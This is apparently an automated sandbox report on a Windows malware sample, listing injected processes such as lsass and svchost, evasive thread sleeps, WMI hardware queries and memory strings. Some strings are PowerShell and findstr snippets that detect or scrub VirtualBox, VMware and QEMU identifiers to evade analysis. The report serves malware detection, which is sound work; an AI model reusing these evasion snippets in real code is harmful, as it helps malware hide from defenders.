Source: C:\Windows\System32\winlogon.exe TID: 1920Thread sleep time: -6642000s >= -30000sJump to behavior
Source: C:\Windows\System32\lsass.exe TID: 4348Thread sleep count: 8255 > 30Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 4348Thread sleep time: -8255000s >= -30000sJump to behavior
Source: C:\Windows\System32\lsass.exe TID: 3088Thread sleep count: 456 > 30Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 3088Thread sleep time: -45600s >= -30000sJump to behavior
Source: C:\Windows\System32\lsass.exe TID: 4348Thread sleep count: 497 > 30Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 4348Thread sleep time: -497000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1504Thread sleep count: 728 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1504Thread sleep time: -728000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1516Thread sleep count: 577 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1516Thread sleep time: -57700s >= -30000sJump to behavior
Source: C:\Windows\System32\dwm.exe TID: 4260Thread sleep count: 8752 > 30Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 4260Thread sleep time: -8752000s >= -30000sJump to behavior
Source: C:\Windows\System32\dwm.exe TID: 2508Thread sleep count: 386 > 30Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 2508Thread sleep time: -38600s >= -30000sJump to behavior
Source: C:\Windows\System32\cmd.exe TID: 7772Thread sleep time: -36000s >= -30000sJump to behavior
Source: C:\Windows\System32\cmd.exe TID: 7776Thread sleep time: -33000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6328Thread sleep count: 556 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6328Thread sleep time: -55600s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3552Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5944Thread sleep count: 329 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5944Thread sleep time: -32900s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6204Thread sleep count: 133 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6204Thread sleep time: -133000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3952Thread sleep count: 550 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3952Thread sleep time: -55000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4484Thread sleep count: 453 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4484Thread sleep time: -45300s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3896Thread sleep count: 151 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3896Thread sleep time: -151000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4580Thread sleep count: 535 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4580Thread sleep time: -53500s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6376Thread sleep count: 524 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6376Thread sleep time: -52400s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5264Thread sleep count: 156 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5264Thread sleep time: -156000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6504Thread sleep count: 522 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6504Thread sleep time: -52200s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6560Thread sleep count: 158 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6560Thread sleep time: -158000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5956Thread sleep count: 515 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5956Thread sleep time: -51500s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6300Thread sleep count: 166 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6300Thread sleep time: -166000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5732Thread sleep count: 470 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5732Thread sleep time: -47000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2376Thread sleep count: 45 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2376Thread sleep time: -45000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5580Thread sleep count: 1264 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5580Thread sleep time: -126400s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5572Thread sleep count: 142 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5572Thread sleep time: -142000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4704Thread sleep count: 463 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4704Thread sleep time: -46300s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4304Thread sleep count: 162 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4304Thread sleep time: -162000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4864Thread sleep count: 459 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4864Thread sleep time: -45900s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5188Thread sleep count: 168 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5188Thread sleep time: -168000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5204Thread sleep count: 449 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5204Thread sleep time: -44900s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6200Thread sleep count: 147 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6200Thread sleep time: -147000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5628Thread sleep count: 452 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5628Thread sleep time: -45200s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6124Thread sleep count: 150 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6124Thread sleep time: -150000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4048Thread sleep count: 447 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4048Thread sleep time: -44700s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1056Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2628Thread sleep count: 162 > 30
Source: C:\Windows\System32\svchost.exe TID: 2628Thread sleep time: -162000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2608Thread sleep count: 435 > 30
Source: C:\Windows\System32\svchost.exe TID: 2608Thread sleep time: -43500s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6964Thread sleep count: 171 > 30
Source: C:\Windows\System32\svchost.exe TID: 6964Thread sleep time: -171000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5336Thread sleep count: 423 > 30
Source: C:\Windows\System32\svchost.exe TID: 5336Thread sleep time: -42300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4424Thread sleep count: 160 > 30
Source: C:\Windows\System32\svchost.exe TID: 4424Thread sleep time: -160000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5260Thread sleep count: 419 > 30
Source: C:\Windows\System32\svchost.exe TID: 5260Thread sleep time: -41900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6652Thread sleep count: 410 > 30
Source: C:\Windows\System32\svchost.exe TID: 6652Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5372Thread sleep count: 185 > 30
Source: C:\Windows\System32\svchost.exe TID: 5372Thread sleep time: -185000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 700Thread sleep count: 1276 > 30
Source: C:\Windows\System32\svchost.exe TID: 700Thread sleep time: -127600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3672Thread sleep count: 386 > 30
Source: C:\Windows\System32\svchost.exe TID: 3672Thread sleep time: -38600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2332Thread sleep count: 374 > 30
Source: C:\Windows\System32\svchost.exe TID: 2332Thread sleep time: -37400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3924Thread sleep count: 380 > 30
Source: C:\Windows\System32\svchost.exe TID: 3924Thread sleep time: -38000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1588Thread sleep count: 159 > 30
Source: C:\Windows\System32\svchost.exe TID: 1588Thread sleep time: -159000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1988Thread sleep count: 379 > 30
Source: C:\Windows\System32\svchost.exe TID: 1988Thread sleep time: -37900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1848Thread sleep count: 349 > 30
Source: C:\Windows\System32\svchost.exe TID: 1848Thread sleep time: -34900s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 2156Thread sleep count: 328 > 30
Source: C:\Windows\System32\dllhost.exe TID: 2156Thread sleep time: -32800s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 1928Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5988Thread sleep count: 353 > 30
Source: C:\Windows\System32\svchost.exe TID: 5988Thread sleep time: -35300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4656Thread sleep count: 1257 > 30
Source: C:\Windows\System32\svchost.exe TID: 4656Thread sleep time: -125700s >= -30000s
Source: C:\Windows\System32\spoolsv.exe TID: 5880Thread sleep count: 337 > 30
Source: C:\Windows\System32\spoolsv.exe TID: 5880Thread sleep time: -33700s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D1ED894 FindFirstFileExW,8_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D21D894 FindFirstFileExW,8_2_000001CA7D21D894
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D29DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_000001CA7D29DA18
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D29D894 FindFirstFileExW,8_2_000001CA7D29D894
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD5D894 FindFirstFileExW,9_2_0000017D2DD5D894
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD8DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_0000017D2DD8DA18
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD8D894 FindFirstFileExW,9_2_0000017D2DD8D894
Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000022F4B92DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000022F4B92D894 FindFirstFileExW,12_2_0000022F4B92D894
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1C9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_00000262F1C9DA18
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1C9D894 FindFirstFileExW,14_2_00000262F1C9D894
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1D0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1D0D894 FindFirstFileExW,14_2_00000262F1D0D894
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1DFDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_00000262F1DFDA18
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1DFD894 FindFirstFileExW,14_2_00000262F1DFD894
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115C7DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001C115C7DA18
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115C7D894 FindFirstFileExW,15_2_000001C115C7D894
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115CADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001C115CADA18
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115CAD894 FindFirstFileExW,15_2_000001C115CAD894
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BB497FDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_000001BB497FDA18
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BB497FD894 FindFirstFileExW,16_2_000001BB497FD894
Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000023942B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000023942B1D894 FindFirstFileExW,19_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E13D894 FindFirstFileExW,20_2_000002234E13D894
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E13DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000002234E13DA18
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E16D894 FindFirstFileExW,20_2_000002234E16D894
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E16DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000002234E16DA18
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF056DD894 FindFirstFileExW,21_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF056DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF0570D894 FindFirstFileExW,21_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF0570DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001EF0570DA18
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002287AD7D894 FindFirstFileExW,22_2_000002287AD7D894
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002287AD7DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_000002287AD7DA18
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001B94DA9D894 FindFirstFileExW,23_2_000001B94DA9D894
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001B94DA9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_000001B94DA9DA18
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000002520257DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,24_2_000002520257DA18
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000002520257D894 FindFirstFileExW,24_2_000002520257D894
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000252025ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,24_2_00000252025ADA18
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000252025AD894 FindFirstFileExW,24_2_00000252025AD894
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_000001A9EBFCDA18
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFCD894 FindFirstFileExW,25_2_000001A9EBFCD894
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EC68D894 FindFirstFileExW,25_2_000001A9EC68D894
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EC68DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_000001A9EC68DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: svchost.exe, 0000001B.00000000.1616011073.000002A769A42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.2769621749.000002A769A42000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: svchost.exe, 0000001B.00000002.2769621749.000002A769A42000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmci
Source: svchost.exe, 0000001B.00000002.2788776679.000002A76A110000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
Source: svchost.exe, 00000016.00000002.2839307197.000002287B013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 0000001B.00000000.1618024236.000002A76A55F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00
Source: svchost.exe, 0000001B.00000003.1632715112.000002A76AED2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dcPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000030.00000000.1747638552.000001E2E422B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware(@5$
Source: dwm.exe, 0000000E.00000000.1544586967.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dRomNECVMWarVMware_SATA_
Source: svchost.exe, 0000001B.00000000.1618024236.000002A76A55F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000014.00000002.2867804708.000002234B534000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.2863147572.000002234AE79000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 0000001B.00000002.2788776679.000002A76A110000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 00000030.00000002.2752494125.000001E2E425A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NTFS;;SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000030.00000002.2754902148.000001E2E4302000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001B.00000002.2788776679.000002A76A110000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 0000001B.00000003.1632715112.000002A76AED2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 0000001B.00000003.1623014097.000002A76A5C1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: svchost.exe, 0000001B.00000002.2841236522.000002A76A989000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: svchost.exe, 0000001B.00000002.2788776679.000002A76A110000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: dwm.exe, 0000000E.00000000.1544586967.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 0000001B.00000002.2872440750.000002A76C100000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMCI: Using capabilities (0x1c).
Source: svchost.exe, 0000001B.00000002.2841236522.000002A76A989000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 00000030.00000000.1747638552.000001E2E422B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
Source: cmd.exe, 0000000F.00000003.1557653935.000001C115A85000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.1557843774.000001C115A85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: svchost.exe, 0000001B.00000002.2788776679.000002A76A110000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 0000001B.00000003.1623014097.000002A76A5C1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 0000001B.00000002.2823111724.000002A76A499000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmcir:m
Source: svchost.exe, 0000001B.00000000.1618024236.000002A76A55F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 0000001B.00000003.1632715112.000002A76AED2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
Source: svchost.exe, 0000001B.00000002.2841236522.000002A76A989000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: cmd.exe, 0000000F.00000003.1542431098.000001C115A6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: svchost.exe, 00000030.00000002.2754902148.000001E2E4302000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000030.00000000.1747638552.000001E2E422B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
